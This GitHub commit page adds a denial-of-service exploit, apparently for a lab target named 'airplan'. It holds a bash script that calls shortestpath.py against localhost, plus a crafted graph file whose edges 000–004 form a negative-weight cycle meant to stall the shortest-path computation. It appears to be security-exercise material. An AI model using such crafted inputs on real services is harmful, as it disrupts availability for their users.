-
Notifications
You must be signed in to change notification settings - Fork 1
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
[airplan_5] Add exploit for dos in space.
- Loading branch information
Showing
2 changed files
with
90 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,3 @@ | ||
#!/bin/bash | ||
|
||
python shortestpath.py 127.0.0.1 8443 usr pwd exploit_map_space.txt shortestpath_routemap 000 030 cost |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,87 @@ | ||
31 | ||
000 | ||
001 | ||
002 | ||
003 | ||
004 | ||
005 | ||
006 | ||
007 | ||
008 | ||
009 | ||
010 | ||
011 | ||
012 | ||
013 | ||
014 | ||
015 | ||
016 | ||
017 | ||
018 | ||
019 | ||
020 | ||
021 | ||
022 | ||
023 | ||
024 | ||
025 | ||
026 | ||
027 | ||
028 | ||
029 | ||
030 | ||
30 | ||
000 001 -1 0 0 0 0 0 | ||
001 002 -1 0 0 0 0 0 | ||
002 003 -1 0 0 0 0 0 | ||
003 004 -1 0 0 0 0 0 | ||
004 000 -1 0 0 0 0 0 | ||
004 030 1 0 0 0 0 0 | ||
001 005 1 0 0 0 0 0 | ||
005 029 1 0 0 0 0 0 | ||
001 006 1 0 0 0 0 0 | ||
006 029 1 0 0 0 0 0 | ||
001 007 1 0 0 0 0 0 | ||
007 029 1 0 0 0 0 0 | ||
001 008 1 0 0 0 0 0 | ||
008 029 1 0 0 0 0 0 | ||
001 009 1 0 0 0 0 0 | ||
009 029 1 0 0 0 0 0 | ||
001 010 1 0 0 0 0 0 | ||
010 029 1 0 0 0 0 0 | ||
002 011 1 0 0 0 0 0 | ||
011 029 1 0 0 0 0 0 | ||
002 012 1 0 0 0 0 0 | ||
012 029 1 0 0 0 0 0 | ||
002 013 1 0 0 0 0 0 | ||
013 029 1 0 0 0 0 0 | ||
002 014 1 0 0 0 0 0 | ||
014 029 1 0 0 0 0 0 | ||
002 015 1 0 0 0 0 0 | ||
015 029 1 0 0 0 0 0 | ||
002 016 1 0 0 0 0 0 | ||
016 029 1 0 0 0 0 0 | ||
003 017 1 0 0 0 0 0 | ||
017 029 1 0 0 0 0 0 | ||
003 018 1 0 0 0 0 0 | ||
018 029 1 0 0 0 0 0 | ||
003 019 1 0 0 0 0 0 | ||
019 029 1 0 0 0 0 0 | ||
003 020 1 0 0 0 0 0 | ||
020 029 1 0 0 0 0 0 | ||
003 021 1 0 0 0 0 0 | ||
021 029 1 0 0 0 0 0 | ||
003 022 1 0 0 0 0 0 | ||
022 029 1 0 0 0 0 0 | ||
004 023 1 0 0 0 0 0 | ||
023 029 1 0 0 0 0 0 | ||
004 024 1 0 0 0 0 0 | ||
024 029 1 0 0 0 0 0 | ||
004 025 1 0 0 0 0 0 | ||
025 029 1 0 0 0 0 0 | ||
004 026 1 0 0 0 0 0 | ||
026 029 1 0 0 0 0 0 | ||
004 027 1 0 0 0 0 0 | ||
027 029 1 0 0 0 0 0 | ||
004 028 1 0 0 0 0 0 | ||
028 029 1 0 0 0 0 0 |